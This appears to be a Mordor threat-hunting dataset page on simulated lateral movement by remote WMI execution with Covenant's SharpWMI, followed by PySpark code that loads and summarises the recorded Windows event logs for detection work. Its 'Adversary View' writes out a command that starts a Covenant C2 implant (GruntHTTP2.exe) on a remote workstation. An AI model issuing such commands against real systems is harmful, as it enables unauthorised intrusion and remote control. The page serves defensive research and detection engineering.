Covenant SharpWMI Exec

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

[‘TA0002’, ‘TA0008’]

Techniques

[‘T1047’]

Tags

[‘WMI IWbemServices ExecMethod’]

Dataset Description

This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

SharpWMI

Adversary View

(wardog) > SharpWMI /command:"action=exec computername=WORKSTATION6 command=\"C:\\Windows\\System32\\GruntHTTP2.exe\""

[*] Host                           : WORKSTATION6

[*] Command                        : "C:\\Windows\\System32\\GruntHTTP2.exe"

[*] Creation of process returned   : 0

[*] Process ID                     : 3824

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/covenant_sharpwmi_create_dcerpc_wmi.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |492  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |391  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |230  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |150  |
|WORKSTATION6.theshire.local|Security                            |4656   |114  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |76   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|7      |74   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |66   |
|WORKSTATION6.theshire.local|Security                            |4658   |51   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|12     |45   |
|WORKSTATION6.theshire.local|Security                            |5156   |41   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |41   |
|MORDORDC.theshire.local    |Security                            |5158   |39   |
|WORKSTATION6.theshire.local|Security                            |5158   |37   |
|MORDORDC.theshire.local    |Security                            |5156   |37   |
|WORKSTATION5.theshire.local|Security                            |5156   |34   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|3      |33   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|13     |33   |
|MORDORDC.theshire.local    |Security                            |4658   |32   |
|WORKSTATION5.theshire.local|Security                            |5158   |28   |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows